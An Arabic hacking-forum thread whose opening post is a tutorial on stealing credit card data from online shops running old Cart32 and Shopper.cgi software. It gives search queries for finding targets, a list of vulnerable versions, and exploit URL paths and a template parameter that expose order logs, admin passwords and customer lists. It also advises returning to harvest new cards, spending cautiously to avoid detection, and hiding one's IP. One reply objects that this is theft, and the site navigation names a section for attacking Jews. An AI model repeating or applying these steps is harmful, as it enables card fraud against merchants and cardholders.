شبكة الجزائر البيضاء

إبــــــــــــــــــــــــــــــــــداع وتــــــــــــــــمـــــــــــــــــيــــــــــــــــــــــــــــــــز http://dzair.forumalgerie.net
 
غرفة الدردشة  الرئيسيةالرئيسية  البوابةالبوابة  س .و .جس .و .ج  التسجيلالتسجيل  دخولدخول  بحـثبحـث  

شاطر | 
 

 درس اختراق الفيزا كارد حصرى على كايروز.....عند اخيكم dj hack younes

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
Boy crazy
عضــو هـــام
عضــو هـــام




الــــدولــــة :
الـــهوايـــــة :
الــمـهنـــــة :
الـــجـنـــــس : ذكر
الـــمـــــزاج :
المتصفـــــح :



عدد المساهمات : 1075
نقاط الإمتيازات : 10395
تاريخ الميــلاد : 24/06/1997
تاريخ التسجيـل : 16/05/2011
أمــنيــتــــي : La solitude me tue ...... quand je suis dans l'unité de ma situation et j'ai besoin de ceux qui m'a

مُساهمةموضوع: درس اختراق الفيزا كارد حصرى على كايروز.....عند اخيكم dj hack younes    6/21/2011, 14:49

درس اختراق الفيزا كارد حصرى على كايروز

اود انا اتحدث معكم عن موضوع مهم جدا و مجهول لدى الأغلبية و هوا الفيزا .. Shopping Cart


و قد لاحظت من اشتراكي في المنتديات العربية و الأجنبية " الأجنبية اكثر " ان اهتمامات العرب تختلف عن اهتمامات


الأجانب .. و هذا الشىء ملحوظ .. و اهم ما تلحظه من النظرة الأولى .. ان الأجانب يهتمون بأي وسيلة لجلب المال


و من هنا بدأ اهتمامهم بكيفية الحصول على الـ Shopping Cart للغير ...


و قد طالب مني الكثير جدا بعرض التفاصيل حول ال Shopping Carts


و سأقوم بعرض الطرق و بالتوالي تدريجيا ..


الكثير يرى مننا هذه الرموز ولا يعرف الى ماذا تعني ..



Cvv2 = CC with cvv code
Cvv = same with cvv2
cc = credit card


لدرس اليوم ينقسم الى :
اولا : عبر مواقع ذات نظام Cart32
ثانيا : عبر الـ Shopper.cgi


عبر مواقع ذات نظام Cart32 :


1.) ايجاد مواقع بأنظمة Cart32
2.) هل هذه المواقع مصابة ؟
3.) الثغرات .
4.) العودة مرة اخرى في المستقبل .



-----------------------------
اولا / ايجاد المواقع الشرائية :
-----------------------------



لإيجاد مثل تلك المواقع امر سهل على الجميع .. , كل ما عليك هو الذهاب لأي محرك بحث قوي مثل www.google.com او


www.Av.com " المفضل لدي " و من ثم تقوم بالكتابة في مربع البحث عن :


Cart32.exe v3


و التي سوف تقوم بإحضار جميع مواقع الـ cart32.exe ذات الإصدار V*.3 و الذي يعد اكثر الإصدارات المصابة ..


عشان كذا اولا ما تلاقي اي موقع لـ cart32 على طول لا تسيبه يفوت منك ..


-----------------------------
ثانيا : هل الموقع مصاب بثغرة ؟
-----------------------------


و هذا سهل كل ما عليك انك تطالع في هذا الجدول بالأسفل و تشوف الإصدارات و نسبة اصابتها :


v2.5 مصاب 80 %
v3.0 مصاب 60 %
v3.5 مصاب 30 %
v4.0 غير مصاب " حتى الآن "


-----------------------------
ثالثا / The Exploits !
-----------------------------
هذا هو الجزء المهم .. كيفية استخدام الثغرات و هو اسهل ما يمكن ..


فعندما نصل الى احد الـ Cart32 Site مثل :
http://www.example.com/cgi-bin/cart32.exe/whateve???r




كيف نحصل على الكروت الشرائية الموجودة داخله ؟
سنقوم بإضافة الإكسبلوتات الى نهاية الموقع مثل :



http://www.example.com/cgi-bin/cart3...ver-ORDERS.txt
http://www.example.com/cgi-bin/cart3...eve-OUTPUT.txt


الحصول على باسورد الأدمن :
http://www.example.com/cgi-bin/cart32.ini


الحصول على باسورد العملاء :
http://www.example.com/cgi-bin/cart3...rt32clientlist


رؤية المجلدات داخل الموقع :
http://www.example.com/cgi-bin/cart32.exe/error


يوجد الكثير جدا من الثغرات التي يمكن استخدامها " يمكنكم البحث في جوجل"


-----------------------------
رابعا / العودة في المستقبل :
-----------------------------
عندك الحصول على الكروت الشرائية من المواقع ... و مازالت الشركة و الموقع يستقبل الطلبات ..
الحين تكون انت وقعت على كنز هههههههههههههه ليش ؟
لأنك تقدر ترجع بعد كم اسبوع و تاخد الفيز الجديدة مرة ثانية " يا حظك "
اول ما تاخد الفيز .. لا تحاول تاخد منها الكثير او تعطيها لأحد حتى لا تشك الشركة فيكم


.................................................. ...............................................


الطريقة الثانية و هي عبر اختراق الـ Shopper.cgi و يتكون من :


1.) ايجاد مواقع الـ Shopper.cgi .
2.) تجريب الإكسبلوتات عليها .
3.) العودة مرة أخرى للحصول على المزيد .


----------------
أولا / ايجاد الـ Shopper.CgI Site's :
----------------
مثل المرة اللي فاتت .. تروح لمحرك البحث اللي انت تفضله مثل : www.Av.com


و تكتب في صندوق البحث SHOPPER.CGI و تبحث في المواقع حتى تجد مواقع يوجد في اسمه SHOPPER.CGI


مثال : www.example.com/xxxx/SHOPPER.CGI/xxxx


----------------
تجريب الإكسبلوتات :
----------------
لو كان عندك احد المواقع التي يوجد بها الـ shopper.cgi .. تروح تضيف بعدها الإكسبلوتات
" مثل المرة اللي فاتت "
و يوجد الكثير من الإكسبلوتات مثل :
&TEMPLATE=ORDER.LOG
التي تضاف في نهاية اسم الموقع .. و يمكنك البحث عن المزيد في جوجل ...


----------------
العودة مرة اخرى في المستقبل :
----------------


نفس اللي قلته قبل كذا ..


.................................................. ........................
لا تنسى اخفائك للأي بي لحمايتك الشخصية اثناء استخدامك للفيزا ..
" راجع موضوع .. كيف تصبح مجهول الهوية "
.................................................. ........................
لمزيد من التفاصيل يرجى زيارة المواقع التالية :


1 Dansie Shopping Cart 3.04 Multiple Vulnerabilities (Vulnerabilities) Rank: 1000


Last modified on: 2000-04-14
URL: http://www.securityfocus.com/bid/1115


2 SmartWin CyberOffice Shopping Cart 2.0 Client Information Disclosure Vulnerability (Vulnerabilities) Rank: 956


Last modified on: 2000-10-02
URL: http://www.securityfocus.com/bid/1734


3 Dansie Shopping Cart Server Error Message Installation Path Disclosure Vulnerability (Vulnerabilities) Rank: 924


Last modified on: 2003-10-20
URL: http://www.securityfocus.com/bid/8860


4 Smartwin Technology CyberOffice Shopping Cart 2.0 Price Modification Vulnerability (Vulnerabilities) Rank: 917


Last modified on: 2000-10-02
URL: http://www.securityfocus.com/bid/1733


5 iSoft-Solutions QuikStore Shopping Cart template Parameter Directory Traversal Vulnerability (Vulnerabilities) Rank: 909


Last modified on: 2003-12-23
URL: http://www.securityfocus.com/bid/9283


6 Web Merchant Services Storefront Shopping Cart login.asp SQL Injection Vulnerability (Vulnerabilities) Rank: 909


Last modified on: 2003-12-26
URL: http://www.securityfocus.com/bid/9301


7 SunShop Shopping Cart User-Embedded Scripting Vulnerability (Vulnerabilities) Rank: 909


Last modified on: 2002-04-13
URL: http://www.securityfocus.com/bid/4506


8 iSoft-Solutions QuikStore Shopping Cart store Parameter Path Disclosure Vulnerability (Vulnerabilities) Rank: 909


Last modified on: 2003-12-23
URL: http://www.securityfocus.com/bid/9282


9 Hassan Consulting Shopping Cart Arbitrary Command Execution Vulnerability (Vulnerabilities) Rank: 899


Last modified on: 2001-09-08
URL: http://www.securityfocus.com/bid/3308


10 3D3.Com ShopFactory Shopping Cart Cookie Price Manipulation Vulnerability (Vulnerabilities) Rank: 892


Last modified on: 2002-12-02
URL: http://www.securityfocus.com/bid/6296


11 Stockman Shopping Cart Arbitrary Command Execution Vulnerability (Vulnerabilities) Rank: 892


Last modified on: 2003-05-01
URL: http://www.securityfocus.com/bid/7485


12 PDGSoft Shopping Cart Exposed Orders Vulnerability (Vulnerabilities) Rank: 892


Last modified on: 1999-04-20
URL: http://www.securityfocus.com/bid/2315


13 Pacific Software Carello Shopping Cart Carello.DLL Remote Command Execution Vulnerability (Vulnerabilities) Rank: 875


Last modified on: 2002-07-10
URL: http://www.securityfocus.com/bid/5192


14 Virtual Programming VP-ASP Shopping Cart CatalogID SQL Injection Vulnerability (Vulnerabilities) Rank: 875


Last modified on: 2004-03-24
URL: http://www.securityfocus.com/bid/9967


15 IGeneric Free Shopping Cart Cross-Site Scripting Vulnerability (Vulnerabilities) Rank: 875


Last modified on: 2004-03-01
URL: http://www.securityfocus.com/bid/9773

اخوكم الهاكر



الرجوع الى أعلى الصفحة اذهب الى الأسفل
hamza
عضــو هـــام
عضــو هـــام




الــــدولــــة :
الـــهوايـــــة :
الــمـهنـــــة :
الـــجـنـــــس : ذكر
الـــمـــــزاج :
المتصفـــــح :



عدد المساهمات : 1448
نقاط الإمتيازات : 10782
تاريخ الميــلاد : 09/09/1985
تاريخ التسجيـل : 09/11/2010
أمــنيــتــــي : ان احشر مع سيدنا -صلى الله عليه وسلم-
قولو آميــــــــــــن

مُساهمةموضوع: رد: درس اختراق الفيزا كارد حصرى على كايروز.....عند اخيكم dj hack younes    6/21/2011, 20:48

مشكوووووووووووووووووور أستاذ يونس ولكن الحصول على حسابات بهذه الطريقة يعتبر سرقة
نحن نتعلم الهكر حتى لا نظلم ولا نُظلم هذا هو شعار الهكرز أرجو أن تتقبل مروري موضوع قد ينقل ......قيد الدراسة ..... شكرا













الرجوع الى أعلى الصفحة اذهب الى الأسفل
http://dzair.forumalgerie.net
Boy crazy
عضــو هـــام
عضــو هـــام




الــــدولــــة :
الـــهوايـــــة :
الــمـهنـــــة :
الـــجـنـــــس : ذكر
الـــمـــــزاج :
المتصفـــــح :



عدد المساهمات : 1075
نقاط الإمتيازات : 10395
تاريخ الميــلاد : 24/06/1997
تاريخ التسجيـل : 16/05/2011
أمــنيــتــــي : La solitude me tue ...... quand je suis dans l'unité de ma situation et j'ai besoin de ceux qui m'a

مُساهمةموضوع: رد: درس اختراق الفيزا كارد حصرى على كايروز.....عند اخيكم dj hack younes    6/23/2011, 10:06

مشكووووور على الردوووووووووووود
الرجوع الى أعلى الصفحة اذهب الى الأسفل
 
درس اختراق الفيزا كارد حصرى على كايروز.....عند اخيكم dj hack younes
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
شبكة الجزائر البيضاء :: عالم الأنترنت :: قسم محاربة اليهود-
انتقل الى:  
روابــــــط سريعـــــة
https://i66.servimg.com/u/f66/13/86/30/41/stick-10.png الكمبيوتر والأنترنت https://i66.servimg.com/u/f66/13/86/30/41/stick-10.pngالتصاميم والجرافيك https://i66.servimg.com/u/f66/13/86/30/41/stick-10.png الصحة والعلوم
https://i66.servimg.com/u/f66/13/86/30/41/stick-10.png منوعة ثقافية
https://i66.servimg.com/u/f66/13/86/30/41/plus-l10.pngمنتدى البرامج الكاملة والنادرة
https://i66.servimg.com/u/f66/13/86/30/41/plus-l10.pngمنتدى الفيديــو والصوتيــات
https://i66.servimg.com/u/f66/13/86/30/41/plus-l10.pngقســــــــم أجــهــــزة الإستقبـــال
https://i66.servimg.com/u/f66/13/86/30/41/plus-l10.pngمنتدى برامــــج الحمايــــــــــة
https://i66.servimg.com/u/f66/13/86/30/41/plus-l10.pngقسم الهجوم على اليهـــــــــــود
https://i66.servimg.com/u/f66/13/86/30/41/plus-l10.pngمنتدى تطوير المنتديــــــــــــات
https://i66.servimg.com/u/f66/13/86/30/41/plus-l10.pngمنتدى التصميم والجرافيك العام
https://i66.servimg.com/u/f66/13/86/30/41/plus-l10.pngمنتدى برامج وملحقات الفوتوشوب
https://i66.servimg.com/u/f66/13/86/30/41/plus-l10.pngمنتدى السويتش والفـــــــلاش
https://i66.servimg.com/u/f66/13/86/30/41/plus-l10.pngمنتدى التصميـــم ثلاثي الابعاد
https://i66.servimg.com/u/f66/13/86/30/41/plus-l10.pngمنتدى التصميــــم  بالبرامج الأخرى
https://i66.servimg.com/u/f66/13/86/30/41/plus-l10.pngشارك معنا في تطوير المنتـــدى
https://i66.servimg.com/u/f66/13/86/30/41/plus-l10.pngمنتدى المجلة الطبية
https://i66.servimg.com/u/f66/13/86/30/41/plus-l10.pngمنتدى الأعشاب الطبية
https://i66.servimg.com/u/f66/13/86/30/41/plus-l10.pngمنتدى الأدوية الشعبية
https://i66.servimg.com/u/f66/13/86/30/41/plus-l10.pngمنتدى العلوم الإنسانية
https://i66.servimg.com/u/f66/13/86/30/41/plus-l10.pngمنتدى العلوم المعيارية
https://i66.servimg.com/u/f66/13/86/30/41/plus-l10.pngمنتدى الطالب الجامعي
https://i66.servimg.com/u/f66/13/86/30/41/plus-l10.pngرمضان كريم
https://i66.servimg.com/u/f66/13/86/30/41/plus-l10.png نتائج البكالوريا 2012
https://i66.servimg.com/u/f66/13/86/30/41/plus-l10.pngقسم التوظيف والمسابقات
https://i66.servimg.com/u/f66/13/86/30/41/plus-l10.pngقسم القصص والروايات
https://i66.servimg.com/u/f66/13/86/30/41/plus-l10.pngإضحك من القلب
https://i66.servimg.com/u/f66/13/86/30/41/plus-l10.png نتائج التكوين عن بعد


هذه الرسالة تفيد أنك غير مسجل .

و يسعدنا كثيرا انضمامك لنا ...

للتسجيل اضغط هـنـا


 جميع الحقوق محفوظة لشبكة الجزائر البيضاء                                               احصائيات   إتصل بنا   اعلي